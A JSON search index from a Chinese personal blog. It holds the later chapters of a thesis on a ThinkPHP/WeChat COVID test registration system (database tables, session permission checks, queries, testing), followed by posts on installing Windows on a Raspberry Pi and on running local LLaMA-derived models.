对于一个管理系统，了解系统运行的状态是必不可少的。管理员需要随时监控系统的各种指标，以便发现并解决可能出现的问题。因此，需要设计一套完整的系统状态查看接口，以便管理员可以方便地查看系统的注册量、试剂量等信息。这些接口应该具有良好的可扩展性和可定制性，以便满足不同的监控需求。此外，还需要考虑系统状态信息的安全性和保密性，以确保管理员的身份和权限得到充分验证和保护。4.1.2 前台接口在用户端，验证用户身份和获取用户信息是非常关键的操作。系统需要验证用户的身份，以确保用户的合法性和权限。因此，需要设计一套完整的用户验证和信息获取接口，以便用户可以方便地进行身份验证和信息查询。   在核酸检测的用户端，用户需要能够方便地查询自己的检测信息和相关结果，同时扫码人员也需要能够方便地进行核酸检测操作。因此，需要设计一套完整的核酸检测接口，以便用户和扫码人员可以方便地进行核酸检测相关操作。   由于微信的各种限制，例如在微信上调用扫码等操作，需要进行验证。为此，需要后端对微信端的页面进行验证。   为了确保用户端能够获取到管理员发布的与核酸检测相关的信息，需要提供公告的接口。这样，用户端就可以及时了解最新的政策和指南，并采取相应的措施。4.2 数据库设计在核酸检测登记系统中，准确地记录并存储每个人的检测数据至关重要。为了实现这一目标，必须精心设计数据库结构，并确保其可靠性和完整性。设计数据库的关键在于确定各种实体之间的关系以及它们之间的属性，以便能够准确地存储和检索数据。因此，为了满足这些要求，需要采用实体关系图（E-R图）来建立该系统的数据库结构。E-R图能够清晰地展示实体之间的关系，包括实体之间的联系和依赖关系，以及它们之间的属性[12]。   此外，为了进一步确保核酸检测登记系统数据库的可靠性和完整性，我们还对其进行了详细设计。详细设计涵盖了数据库的各个方面，包括数据类型、数据表结构、索引等等。通过仔细考虑每一个细节，我们能够确保该数据库能够准确地存储、管理和检索所有的检测数据，并能够满足各种数据操作的要求。因此，在进行详细设计时，我们不仅仅关注数据库的功能和性能，还需要考虑到系统的可维护性和扩展性，以便在未来的运营过程中能够方便地进行系统的更新和维护。以下内容是该数据库的详细设计。   在进行核酸检测时，通常需要对试管的状态进行检测，因为试管的状态与被检测者的状态是对应的。因此，在设计检测流程时，我将重点记录试管的状态信息。在下表中，我们可以看到有关试管状态的信息，这些信息将有助于我们进行准确的核酸检测。表\t核酸检测管信息表结构            字段名      类型      长度      索引及关系      注释                  id      int      11      主键      主键ID              serial      varchar      11      唯一键      管码              fuid      int      10      关联user表id      所属用户ID              status      enum      0,1             状态（0=未检，1=阴性，2=阳性）              is_del      enum      0,1             软删除              create_time      datetime                    添加时间              update_time      datetime                    更新时间      在存储公告信息的过程中，为了方便管理和使用，我设计了一个包含标题、内容和图片信息的数据表。标题信息是公告的主题，通过标题可以快速地了解公告的内容和主要信息。内容信息则是公告的详细描述，可以包括公告的发布时间、地点、目的、重要性等内容。在某些情况下，公告可能需要配有图片信息，以便更直观地展示公告的内容和意义。因此，我在设计表格时特别留出了图片信息的存储空间。通过这些信息的存储和管理，我们可以更加高效地发布和管理公告，同时也可以使公告信息更加全面和直观。这样有助于提高公告的传播效果和实际效果，确保公告信息得到更好地传递和利用，具体表结构见下表。表\t公告数据表结构            字段名      类型      长度      索引及关系      注释                  id      int      11      主键      主键ID              title      varchar      255             标题              content      text                    内容              media_url      varchar      255             媒体URL              uid      int      10      关联user表id      添加者（仅超管）              is_del      enum      0,1             软删除              create_time      datetime                    添加时间              update_time      datetime                    更新时间      为了使后台管理人员和微信用户都能够方便地使用系统，我在设计用户信息表时特别考虑了用户权限的管理和用户身份的识别。为此，我同时设计了密码和微信OpenID字段。密码字段可以使后台管理人员设置用户密码，以便管理人员能够轻松地通过用户名和密码登录系统进行管理操作。微信OpenID字段则是为了便于微信用户在登录系统时进行身份识别和权限验证，从而能够更加便捷地使用系统的各种功能。通过这样的设计，系统不仅可以实现后台管理和微信用户端的统一管理，而且也使得系统更加简洁和易用，具体表结构见下表。表\t用户信息表结构            字段名      类型      长度      索引及关系      注释                  id      int      11      主键      主键ID              name      varchar      11             用户名              password      char      32             密码（md5）              uniqid      char      18      唯一键      身份证号码或员工号码（登录用）              gid      enum      1,2,3,4             组ID（1=普通用户，2=扫码员，3=检测员，4=超管）              wechat_openid      char      29      唯一键      微信OpenID              is_del      enum      0,1             软删除              create_time      datetime                    添加时间              update_time      datetime                    更新时间      由于核酸检测中往往会存在混检的情况，即多个人的检测样本可能会被混在一起进行处理，因此在设计数据库表格时需要特别注意用户和检测管之间的关系。为了更好地处理这种情况，我将用户与检测管的关系设计为多对多的关系，即一个用户可能对应多个检测管，一个检测管也可能对应多个用户。这样，当出现混检情况时，我们可以通过用户与检测管之间的关联表来准确地确定每个检测管中所包含的样本属于哪些用户，从而可以快速地解决混检问题。下表是用户与检测管的关联表的表结构，包括用户ID、检测管ID等字段，这些字段将为用户和检测管之间的关系提供关键信息。表\t用户-检测管关联表结构            字段名      类型      长度      索引及关系      注释                  id      int      11      主键      主键ID              kid      int      11      关联kit表id      检测管ID              uid      int      11      关联user表id      用户ID              add_time      datetime                    添加时间      4.3 本章小结本章详细介绍了核酸检测登记系统的系统设计。明确了系统设计的目标和预期的成果，为项目的顺利实施奠定了基础。设计实现了数据库的搭建，确保系统的数据存储和管理能够高效、稳定地运行。详细描述了系统的接口，以确保系统的各个模块之间能够良好地交互和通信。通过对系统接口的设计描述，为最后的相关系统的实现打下了坚实的基础。第5章\t系统实现在本系统中，由于大多数接口都是常规的接口，所以我们在本章中主要着重介绍其中核心的功能以及技术。这些核心功能和技术对于系统的整体性能和可用性起着至关重要的作用。我们将详细介绍这些核心功能和技术的实现原理，包括其设计思路和代码实现等方面，以便读者可以更加深入地理解系统的工作原理和实现细节。5.1 权限系统的实现在一个系统中，确保每个用户只能访问其被授权的资源是至关重要的。为了实现这一目标，开发者需要采取措施来明确用户之间的权限区分。在我开发的系统中，我使用了ThinkPHP框架提供的Controller的$beforeActionList属性，这个属性可以在每个控制器方法执行之前调用指定的方法，从而使得系统可以对用户的权限进行预处理。通过在$beforeActionList中设置适当的权限验证方法，可以确保只有具备相应权限的用户才能够执行对应的操作。这种做法不仅可以提高系统的安全性，还可以保护系统中的敏感信息不受未授权用户的访问。   所以我在我的大多数接口前都写了一个auth()函数，内容如下：protected $beforeActionList = [    'auth'];protected function auth(){    if (!session('user')) {        die(json_encode(['code'=>400,'msg'=>'请先登录']));    }}因为系统在登录时使用了Session存储用户信息，所以通过这种方式就可以判断用户是否登录，未登录用户将没有权限执行接下来的语句。不过对于登录注册等功能不适用此方法，这时候将$beforeActionList中所调用的函数后面加一个值，例如：protected $beforeActionList = [    'auth' => ['except'=>'login,register']];就可以让这两个方法不调用auth()函数。   在此系统中，为了确保不同用户能够获得其对应的权限，我采用了gid进行区分。gid是指用户所属的组别，在我的设计中，不同的gid代表不同的权限级别。为了使系统更加安全，我设置了一个权限门槛，只有具备特定gid的用户才能够访问系统中的特定资源。例如以下代码：if (session('user')['gid'] < 3) {    die(json_encode(['code'=>400,'msg'=>'权限不足']));}如果用户的gid值小于3，即比检测员的权限小，则表示其权限不足，无法执行相应的操作，我会通过在程序中判断用户的gid值，如果用户权限不足，则会返回一个错误提示，并终止程序的执行。这种做法可以保护系统中的敏感资源不被未授权用户访问，同时还可以防止潜在的恶意行为对系统造成损害。此外，我还允许高权限的用户执行低权限用户的所有接口，从而能够更加灵活地控制系统中的访问权限。这种做法可以为系统的使用者提供更加便利的操作体验，同时还能够保护系统的安全性和稳定性。5.2 数据增删改查的实现在ThinkPHP5.1框架中，我们可以使用think\\Db类来访问数据库。考虑到系统需要具备高性能的特点，我在使用数据库时，使用了Db::execute和Db::query方法，而不是使用构造器或者模型来实现数据操作。这是因为使用构造器或者模型会增加系统的复杂度和开销，而Db::execute和Db::query方法能够更加高效地实现数据操作，从而提升系统的性能。同时，为了保证系统的安全性，我在使用Db::execute和Db::query方法时，采用了参数化的方式来进行数据查询和更新操作，避免了SQL注入等安全问题。参数化查询能够通过将参数传递到查询语句中，从而防止恶意用户通过在查询参数中插入恶意代码，对系统造成安全威胁。   在设计查询接口时，我为了进一步提高系统的运行效率，使用了SQL_CALC_FOUND_ROWS关键字来统计查询结果的总条数。相比于使用COUNT()函数，使用SQL_CALC_FOUND_ROWS可以减少不必要的查询次数，从而更加高效地实现数据的查询和处理[13]。这是因为在使用COUNT()函数时，需要进行两次查询：第一次查询结果记录数，第二次查询结果数据，而使用SQL_CALC_FOUND_ROWS则只需要进行一次查询，同时还能够获得查询结果的总条数，这种做法能够节省系统的运行时间和资源开销，从而提升系统的性能和用户体验。例如获取公告列表方法：public function read($offset = 0, $limit = 10){    return json(['code'=>200,'msg'=>'获取成功','data'=>Db::query(\"select SQL_CALC_FOUND_ROWS id, title, content, media_url, create_time, update_time from notice where is_del='0' limit ?,?\",[$offset,$limit]),'count'=>Db::query(\"select FOUND_ROWS() as count\")[0]['count']]);}5.3 核酸检测的实现在微信网页开发中，为了保证安全性，微信官方要求从后端调用微信公众号接口获取凭据[14]，然后在前端注入后才可以使用诸如扫码等功能。在使用扫码功能时，对于管码只处理条形码，添加用户时只处理二维码。   另外，用户的二维码除了用户本身的信息以外，还有红黄绿三种颜色。这三种颜色是根据最近的核酸结果得出，如果七天未检查为黄色，七天内最后一次检查为阴性为绿色，阳性为红色。   在实现扫码功能时，为了保证系统的高效性，我们会将需要提交至后端的数据在一个变量中进行处理，最终收集齐所有信息再一次性提交。这种做法能够降低整个服务器的压力，提高系统的性能表现。   在此之后，检测员将会使用后台界面去修改核酸状态。修改后，用户就能及时收到检测结果。并显示在用户检测的历史记录中。5.4 微信公众号异步发送通知的实现在本系统中，用户需要通过微信公众号接收核酸检测的结果。当检测员得出结论并修改核酸结果后，用户就能收到核酸检测的结果。   收到通知后可以在近7次核酸检测中看到结果，这个结果是使用一条联表查询得出：Db::query(\"SELECT user.`name`, kit.`status`, user_kit.add_time FROM user_kit INNER JOIN kit ON user_kit.kid = kit.id INNER JOIN `user` ON kit.fuid = user.id WHERE user_kit.uid = ? ORDER BY user_kit.add_time DESC LIMIT 7\", [session('user')['id']])然而，调用微信公众号接口通知用户的速度较慢，可能会导致用户体验不佳。为了避免这种情况的发生，我使用了php-fpm专有的函数fastcgi_finish_request()来实现此功能。   fastcgi_finish_request()函数可以将响应发送到客户端，然后继续处理其他任务，从而提高系统的响应速度和性能。在我的设计中，当检测员修改核酸检测结果后，我在调用微信公众号接口通知用户之前，先使用fastcgi_finish_request()函数将响应发送给客户端。这样一来，系统就可以在发送响应的同时，继续执行其他任务，从而避免了用户等待时间过长的问题，提高了系统的响应速度和用户体验。5.5 公众号界面的菜单实现为了更方便地设计菜单，我选择使用回复信息来承载菜单。具体实现方法如下：首先，在定义微信内置的菜单时，我设定了一个带有click事件的按钮。然后，在我的回调地址中监听这个事件，一旦收到了点击事件，就会触发回复菜单的操作。这样，就可以很轻松地获取用户信息，并根据用户的权限来判断可以使用哪些选项，从而实现更加个性化的菜单设计。   为了保证系统的高效运行，我在这里的实现中使用了cache去缓存用户信息。这种做法的好处在于，它可以避免因为数据库过慢而导致的性能问题，同时还可以让菜单更快速地返回。具体来说，当用户进行菜单操作时，系统会首先检查cache中是否存在该用户的信息。如果存在，则可以直接从cache中获取用户信息，而无需再次访问数据库，从而大大提高了系统的响应速度。而如果cache中不存在该用户的信息，则会去数据库中获取，并将获取到的信息缓存到cache中，以供下一次使用。5.6 本章小结在前几章的内容基础上，本章详细阐述了系统的具体实现过程。考虑到篇幅限制，我们选择了一些关键技术作为示范进行说明。包括了系统的一些重要功能和实现。第6章\t系统测试6.1 测试概述核酸检测登记系统是一种用于信息收集的软件，其研发和使用对于疫情的防控具有十分重要的意义。本章旨在对核酸检测系统进行测试，并对测试过程和结果进行概述。   测试的目的是为了验证核酸检测系统在生产环境下的性能、可靠性、安全性以及交互性等方面是否符合需求和用户期望，同时确保系统的完整性和稳定性。测试的对象包括系统的功能、性能、接口、兼容性、安全等各个方面。在测试过程中，我们还将发现问题和瑕疵，并提出改进建议，以确保系统能够更好地满足用户需求。   在功能性测试阶段，我们将测试每个功能的正确性、完整性和易用性，以确保系统能够按照用户需求稳定运行，并关注客户需求，提高用户满意度。在兼容性测试中，我们将测试核酸检测系统的兼容性。在性能测试中，我们将测试系统的响应时间、资源使用率和负载能力等，以确保系统具备高效、快速和高性能的特点。   此外，测试活动还关注了其他方面的问题，如数据安全、网络安全和用户体验等。我们测试了数据的保密性和完整性，网络通信的防伪保密等方面，并检查软件是否易于使用，是否具有直观性、一致性和可信度等特点。6.2 关键环境测试在开发过程中，环境测试的重要性不言而喻。在测试过程中，尽可能多地考虑不同软硬件条件下的情况可以最大化地发现问题。因此，建议在不同的操作系统环境和不同的计算机硬件环境下进行测试[15]。   对于关键测试的软件环境，我们的程序主要是在微信客户端上运行，因此测试主要针对微信上的运行环境进行。其次，我们也在Android系统、iOS系统以及Android模拟器上进行了测试，除此之外，还有后端API接口是在服务器上运行，也会对其进行测试，具体测试内容如下表所示：表\t关键环境测试列表            软件环境      硬件环境      软件      测评对象      能否使用                  Android 12      Redmi K20 Pro      微信      公众号页面      能              iOS 13      iPhone 12      微信      公众号页面      能              Android 12      Xiaomi 12      微信      公众号页面      能              Android 13      WSA模拟器      微信      公众号页面      能              MacOS 13      Macbook Pro      PHP      后端API      能              Ubuntu 22      阿里云服务器      PHP      后端API      能              Windows Server 2022      阿里云服务器      PHP      后端API      能      6.3 软件性能测试性能测试是一种测试方法，用于测量软件系统在不同的工作负载下的性能、稳定性和可靠性，以确定系统性能瓶颈和性能瓶颈的原因。在设计性能测试时，需要考虑系统的关键性能指标，并设计测试用例以验证这些指标。对于本系统来说，响应时间和并发数是比较重要的性能指标，因此，在设计性能测试时主要针对这两点进行测试[16]。   为了测试系统的性能，我们以后台登录为示例，设计了一个性能测试用例表，结果如下表所示。表\t性能测试用例表            用例名称      描述      预期结果                  正常登录测试      输入正确的用户名和密码，登录系统      登录响应时间在3秒以内，用户能够成功登录系统              错误用户名测试      输入错误的用户名和正确的密码，尝试登录系统      登录响应时间在3秒以内，系统提示用户名或密码错误              错误密码测试      输入正确的用户名和错误的密码，尝试登录系统      登录响应时间在3秒以内，系统提示用户名或密码错误              多用户并发测试      多个用户同时登录系统      系统能够处理多个用户的请求，并保持响应时间在3秒以内              长时间登录测试      单个用户长时间登录系统      系统能够保持响应时间稳定，并不会出现登录超时或登录失败的情况      6.4 测试功能及测试用例设计设计测试用例是为了检查程序路径是否满足某些特定要求，测试用例包含实际测试输入、执行条件和预期结果。整个测试任务的核心工作在于测试用例的设计，因为好的测试用例可以直接揭示系统中的潜在问题。通过解决这些潜在问题，可以大幅提升系统的性能和用户体验。在功能测试过程中，测试用例的设计一般包括四个部分：主题、前提条件、执行步骤和期望输出结果。以下以进行核酸检测接口为例设计测试用例，并总结测试结果[17]。   针对核酸检测接口进行测试后，对测试结果进行了分析：所有测试结果都与预期输出结果一致，表明该用例的功能测试已经完成。测试表明，本系统能够达到与测试性能相应的要求，并且成功地完成了相应的功能。6.5 本章小结在本章中，首先简要介绍了软件测试的必要性和常见的测试方法。接着，我们详细讲解了如何进行软件环境和软件性能测试，包括性能测试中的负载测试、压力测试等。最后，我们以核酸检测功能为例，设计了测试用例并进行了用例测试，得到了丰富的测试结果和数据，帮助我们评估软件的稳定性和可靠性，以及发现和修复潜在的问题和漏洞。第7章\t结论7.1 总结在这次的软件设计过程中，我采用了系统化的方法来确保最终的系统能够满足用户的需求和期望。首先，我进行了详细的需求分析，明确了系统的核心功能和特点。在这个过程中，我深入研究了中外核酸管理系统，学习借鉴了其中的经验和教训，从而能够更好地理解核酸数据的隐私和安全问题。因此，在系统设计中，我注重了权限验证和安全措施，以确保用户的数据不会被恶意使用或泄露。同时，我也考虑到用户的使用体验，优化了交互方式，让系统更加易于使用和友好。   在流程梳理过程中，我将整个系统的业务流程进行了详细的拆分和设计，通过建立流程图来清晰地表达系统的运作方式。我采用了敏捷开发的方法，将整个开发过程划分为多个迭代，每个迭代都可以快速交付可用的功能模块，以确保系统可以逐步完善。在这个过程中，我进行了前后端的沟通和协作，以及技术的不断学习和探索，以便更好地解决遇到的挑战和问题。   在开发过程中，我遵循了代码规范和工程管理标准，采用了Git等工具进行版本控制和团队协作。我使用了ThinkPHP框架和MySQL数据库进行开发，并对系统进行性能和安全方面的优化，以确保系统的可靠性和稳定性。我深入研究了框架和数据库的细节，并对它们进行了合理的调优，从而提高了系统的运行效率和安全性。   同时，我们还进行了系统的测试和优化。在测试过程中，我们对系统进行了功能测试、性能测试、安全测试等多个方面的测试，以确保系统的功能符合要求、性能稳定高效、安全性强。在测试中发现的问题，我们及时进行了优化和修复，确保了系统的稳定性和可靠性。   在整个开发过程中，我们遇到了很多挑战和问题。例如，开发周期紧张、需求变化频繁、技术不熟悉等。但是，通过加强前后端的沟通和协作，以及技术团队的不断学习和探索，我们逐步解决了这些问题，并最终实现了一个高效、稳定、安全的系统。   综上所述，基于ThinkPHP的核酸检测登记系统的设计与开发是一项非常具有挑战性的工作。通过对需求分析、流程梳理、开发过程等的认真规划和实践，最终，我们成功地实现了一个高效、稳定、安全的系统，能够为疫情防控工作做出贡献。7.2 展望虽然疫情已经结束，但是可以将登记系统进一步完善，以适应未来的发展需求。以下是三个可以实施的改进方案：   首先，可以增强数据分析功能。通过积累更多用户数据，我们可以进行更全面的数据分析和处理，从而提供更准确、有用的信息和分析结果。例如，我们可以分析疫情传播趋势、用户行为模式等，为政府和医疗机构提供更有效的决策支持。   其次，可以增加预约功能。现有系统只能登记用户信息和检测结果，但未来我们可以考虑增加预约功能，让用户能够在线上进行检测预约。这样用户就可以更方便地安排行程，同时也可以减少排队等待时间。   第三，可以引入自动化处理技术，如人脸识别技术等，以实现自动识别用户信息和检测结果。这样就可以减少人工处理的时间和工作量，提高工作效率。   未来，如果有机会，我们可以让这个系统发挥更多的作用，比如在未来的其他疫情中起到重要的作用。我们可以引入更多的功能和技术，以满足未来需求的变化，从而更好地保障公共卫生和社会安全。参考文献  ^ 靳英辉,蔡林,程真顺,等. 新型冠状病毒(2019-nCoV)感染的肺炎诊疗快速建议指南(标准版)[J]. 解放军医学杂志,2020,45(01):1-20.  ^ 宗晓祥，胡云，马利亚.核酸检测云平台的设计与实现[J].集成电路应用, 2022, 39(10): 47-49.  ^ Shaun Griffin. Covid-19: NHS England should manage test and trace system, says Independent SAGE[N]. BMJ,2020,371:m4330  ^ Simon Judith,Rieder Gernot. Trusting the Corona-Warn-App? Contemplations on trust and trustworthiness at the intersection of technology, politics and public debate[J]. European Journal of Communication,2021,36(4).  ^ 喻健,鲍琪. 基于ThinkPHP的人口信息系统设计[J]. 信息技术与信息化,2022,(02):9-12.  ^ 蒋先梅. 基于PHP的学生信息管理系统的设计与实现[J]. 无线互联科技,2023,20(01):45-47.  ^ 谷恪忱. 基于ThinkPHP框架的工控品采购平台设计与实现[J]. 软件工程,2020,23(03):53-59.  ^ 赵莹,胡畅达,王国宇. 三种关系型空间数据库比较[J]. 科技创新与应用,2021,11(19):62-64.  ^ 李琦,姚龙. 基于REST架构的湖泊环境监测物联网平台[J]. 计算机工程,2016,42(11):27-31+37.  ^ 卢彦晓. 浅谈前后端分离技术在权限管理系统中的应用[J]. 电脑知识与技术,2021,17(34):68-69.  ^ 张然,孙浩,张鑫. 基于JavaWeb的阿尔茨海默症早期康复系统设计[J]. 电子技术与软件工程,2022,(23):259-262.  ^ 杨中书,刘臣宇. 基于E-R模型的关系数据库设计方法[J]. 价值工程,2014,33(30):242-243.  ^ 黄金春,杜娟娇. 编写web服务器远程查看mysql数据[J]. 信息系统工程,2009,(07):26-29.  ^ 陶亮亮. 基于微信公众号的掌上医院的设计与实现[J]. 电脑知识与技术,2022,18(09):46-48.  ^ 陈莎莎. 基于JSP网页技术的高校PU系统功能可视化界面设计[J]. 自动化与仪器仪表,2023,(02):146-151.  ^ 纪芩. 基于云平台的软件性能测试技术分析[J]. 电子技术与软件工程,2022,(23):74-77.  ^ 刘肖. 基于JSP+MySQL的供电管理系统的设计与实现[D].电子科技大学,2021." },{ "title": "使用树莓派安装Windows的尝试", "category": "", "tags": "树莓派, Windows", "url": "/2023/05/22/rpi-win.html", "date": "2023/05/22", "content": "树莓派能不能作为迷你主机使用呢？起因前段时间，家里人送给了我一个树莓派4B-8GiB内存版，因为手头用着MacBook Pro，看到这个比我之前用的树莓派3B好了不少的东西，就开始想它能不能和用着一样是ARM架构的Mac Mini M2那样使用，当然想给树莓派安装黑苹果那就是天方夜谭了，毕竟macOS里用到的很多东西也不完全只是ARM，想想也知道既然是苹果自己研发的芯片，里面肯定是有一些比如专有的指令集什么的，树莓派应该算是公版的ARM吧？肯定有些指令是没有的……不过我还是愿意仿个macOS试试看，我在网上看好像TwisterOS仿macOS的效果最好，而且它是基于树莓派官方系统开发的，所以应该也没啥兼容性的问题，另外它其他的主题比如仿Windows的做的也不错，但仿Windows还不如给它装一个真正的Windows，毕竟网上是有能够给树莓派安装Windows ARM版的办法的。给树莓派安装Windows最开始我想给树莓派安装Windows的时候手头没有Windows的电脑，但是给树莓派安装Windows所用的软件Windows on R貌似用到了Windows上的一些东西。不过他们提供了一种可以先给卡里安装WinPE然后再安装系统的办法，最开始我是先尝试的那种方案，我可以先用一张安装了树莓派官方系统启动树莓派，然后用WoR-flasher给另外一张卡安装WinPE以及系统镜像。操作很简单，照着README做就行了，不过不知道是为什么，尝试了好几次，每次安装到一半就卡住然后报错安装失败，然后连WinPE都进不去了……   我怀疑是通过这种方式安装可能有什么问题，而且当时安装到时候卡是32GiB大小的，虽然官网上说32GiB是足够的，不过也许还是有什么问题？所以后来我重新买了一张64GiB的卡片，并且用Windows去运行Windows on Raspberry imager给卡里安装了Windows 11，不过很奇怪的是还是运行不了……换了好几个系统镜像都不行，后来才发现原来是我自作多情每次启动的时候都把频率调成2.2GHz所以不能启动，默认的1.5GHz或者调高到2.0GHz都没有问题😥，因为这个问题尝试了好多次……在树莓派上的Windows体验安装好之后就可以尝试验证树莓派的生产力了，不过结果让我很失望……首先是我用的TF卡是UHS-1，写速度貌似是10MiB/s？读速度商家宣传是130MiB/s不过实际上我也不太清楚，随机读写估计就更慢了……这样的速度加载东西实在是有够慢……另外目前在树莓派上使用的Windows驱动里并没有无线网卡和核显的驱动，所以体验也很差，移动窗口之类的操作CPU都占用了不少，我本来还想着考虑能不能比Macbook开虚拟机效果好一些，不过目前来看这个结果应该是只差不好吧……虽然价格上树莓派和Mac Mini M2差了4倍，不过体验这么差的话估计当生产力是没机会了。Linux的生产力对比相比之下用树莓派官方的系统感觉要流畅不少，毕竟官方系统的所有驱动都是正常工作的，应该也能使用硬件解码，只是有些桌面版的程序没有，比如MS Office，还有像7-Zip、WinSCP、XShell之类的软件 （其实macOS也不行🤣） ……用Wine怎么样呢？其实我觉得应该好不到哪里，毕竟大多数Windows的程序都是x86_64指令集，Wine想要运行这些软件照样得靠QEMU翻译，只不过可能调用的一些Windows的API可以原生执行而已，除了这些之外，我还试了试用Chromium播放Bilibili的视频，结果也令人大失所望，360p的视频都不能流畅播放，更别说1080p了（当然也不排除是因为Bilibili的视频用了硬件解码器不能解码的编码方式），虽然相比树莓派3B来说确实至少可以流畅浏览网页了，但是连视频都不能流畅播放那看来想当生产力还很远呢。感想果然树莓派还是没有办法当作普通的电脑来用啊，更不用说生产力了，同样的价格至少还能组个能打游戏的电脑。尽管性能比树莓派3B好不少，但毕竟用的还是很低级的芯片，也许它就应该当作物联网的开发板来使用吧，但很奇怪的是如果是这样，树莓派3B就足够了吧，何必开发树莓派4B以及带键盘的树莓派400呢？还有就是树莓派CM4，他们不会真以为自己的芯片速度很快吧🤣？" },{ "title": "关于最近人工智能的探索", "category": "", "tags": "AI, LLM, 人工智能", "url": "/2023/04/05/ai.html", "date": "2023/04/05", "content": "最近人工智能发展的还真是不错啊……起因最近ChatGPT为代表的人工智能发展的越来越好了，而且因为它对生产力的提升使得了解AI的人也越来越多了。虽然我也不算是对AI很感兴趣，但是我在Github Copilot刚出的时候就已经用上了，到现在一直在用（不过毕业了以后估计就用不了了吧😂）。不过那时候Copilot毕竟专业性比较高，知道的人也比较少，不像现在ChatGPT能在各行各业使用，甚至还有基于类似模型的Vtuber，比如Neuro-sama，所以即使是普通人使用它，都能够减轻自己的工作压力，所以现在的人们都在讨论它。   当然在这之前，还有一些很厉害的画图AI，比如使用了Stable Difusion的NovalAI，以及Midjourney啥的，不过因为我对画图并不感兴趣，所以它发展的有多好也基本上和我没有关系。其实除了这些能够AIGC的模型之外，在那之前还有下围棋的AlphaGO啥的，那个我就更不感兴趣了，相信大多数人也不感兴趣，所以总的来看也就只有现在才能证明AI发展到了能够让大家觉得能干涉到更多人的地步吧。   也正因为现在以ChatGPT为代表的LLM的发展，开源社区也开始搞起来一些有意思的东西。不过LLM的训练成本比较高，所以现在开源社区在这一块的发展也许得感谢比如Facebook的LLaMA之类基础的模型，才能让大家能用较低的成本去训练属于自己的AI吧。关于LLaMA衍生的模型体验在刚开始LLaMA被Facebook开源的时候，GitHub上就出现了llama.cpp这个项目，因为我没钱买显卡，手头只有笔记本电脑上的一张非常垃圾的GTX1650Ti 4GiB显存的显卡，多亏了这个项目，可以让我这种没显卡的人也能体验LLM的乐趣。而且这个项目使用起来非常简单，不像很多AI项目还要装什么TensorFlow啊，还是什么PyTorch啥的，那些东西不仅大，还非常的挑版本，这个项目运行的时候就什么都不用考虑，对使用者来说非常的友好，像清华那个ChatGLM-6B我就完全跑不了，它要想正常体验得要有8GiB的显存，我就没法整这种东西了。   我体验了那个最开始的LLaMA-7B的模型，效果其实不怎么样，根本没法流畅对话，不过也能理解，因为它应该相当于是把一堆数据堆到一起的东西吧，也没有针对对话进行训练。不过很快，斯坦福大学对这个模型进行了Finetune，制作出了Alpaca，当然这个仓库里面的东西是纯粹的菜谱和食材，把他们加工成模型得要整一堆A100的显卡跑几个小时，这个我可整不来，不过还好有人根据这个原材料加工成了完整的模型，现在去🤗上就能下载的到，比如去这个仓库就能下载到训练好的模型，在这里可以下载到已经经过量化，直接可以给llama.cpp使用的版本（不过现在llama.cpp升级了，得要按照说明在仓库里执行那个Python脚本进行转换才能正常使用）。   我运行这些东西是在我的Macbook Pro上，它只有8GiB的内存，所以只能跑7B（70亿参数）的模型，不过就这个模型也已经非常厉害了，虽然只能说英文，但是流畅程度，上下文关系的能力都非常不错，而且常见的知识都能正确回答，效果让我很满意。不过8GiB内存实在是太小了，想跑点别的也没办法……不过16GiB内存的电脑我还是能找得到的，我找了台CPU是i7-11700K的台式机跑了下使用GPT-4对话数据微调的13B模型，速度比M2芯片跑的速度感觉慢了至少5倍吧，Macbook生成的速度基本上能达到对话的语速，台式机跑的速度那就是一个一个词往出蹦，这下就能感受到M2芯片的计算能力还是强大啊，4大核+4小核比8核16线程还要厉害，苹果的产品属实有点东西😝，不过这个13B的模型也确实厉害，有些7B的模型回答有错误的部分这个13B的都能正确回答，如果我能整个16GiB的Macbook可能就能完整体验了吧，可惜苹果家的内存比金子都贵，实在是买不起啊……   斯坦福的这种Finetune方法成本还是有点高，所以后来又有人研究出了一个叫LoRA的办法去Finetune模型，据说只要一张普通的显卡就可以进行，不需要一堆高级显卡也能跑，不过再低级的显卡，也不是我这GTX1650Ti能碰瓷的，所以我也只能看看别人训练的模型啦。在看的时候我发现了一个用的中文训练集跑的模型项目Chinese-LLaMA-Alpaca，看起来还挺有意思的，不过他们似乎担心什么版权问题，只放出了LoRA权重，没有完整的模型，就相当于是没有面饼的泡面，只有料包，好在他们倒是给了去哪里找面饼。不过泡面的这个过程对我来说也挺难的，合并它需要13-15GiB的可用内存，16GiB的内存肯定不够用，所以得找一台32GiB内存的电脑（不会有人组非2次方倍数内存的电脑吧？）……我手头没有，还好从网上找了台免费的云主机，整了个32GiB内存的，才成功的把这碗面泡出来了。虽然泡面的步骤不多，也不算特别难，只是我是觉得干嘛同一碗面泡那么多次，不如我提前泡好直接放网上，所以我也在🤗上上传了最终合并并量化的模型，在这里就能下载到直接就能拿来用的模型了。至于运行的参数就按照之前仓库的操作就行了。让M2芯片发挥更大的作用在我玩完那个llama.cpp项目之后，我觉得让M2芯片光用CPU算好浪费啊，毕竟这个芯片里面还有神经网络引擎和GPU啊，这些哪个都比CPU算更好吧，不过想要调那些东西进行人工智能计算貌似只能用苹果的Core ML框架。这两天我在Github看到一个苹果官方发布的Core ML Stable Diffusion，看起来还挺有意思的，我倒是也想在我的Macbook上跑一下，正好🤗开发了一个示例Diffusers可以拿来试试看，可惜8GiB内存还是限制了它的发挥，跑是能跑，速度也挺快的，就是模型没法换，因为内存也只能跑小的模型，跑出来可以说真的就是那种抽象的不能再抽象的东西吧……不过不管怎么说，这还是发挥了一下神经网络引擎和GPU的作用吧，不然感觉苹果做了这些东西就没啥作用了😂。感想从这次体验来看，我对开源社区的AI发展感觉还是挺有信心的，虽然相比于ChatGPT之类的来说可能还没办法当作生产力，不过毕竟它比较平民化，至于知识量少的问题如果开发者们能加把油能让这些模型对接网络，那也许就可以在很低成本的情况代替OpenAI的ChatGPT吧，也能避免他们服务器出问题之类的原因导致生产力的下降吧。不过开源这种事情还是有点……毕竟还是不希望这些东西被人拿去商业化，更不希望出现国外一开源，国内就自研这种糟糕情况，也许开源产品比不上人家的商业产品也是正常的。" },{ "title": "PHP异步执行的探索", "category": "", "tags": "PHP, 异步", "url": "/2023/03/12/php-async.html", "date": "2023/03/12", "content": 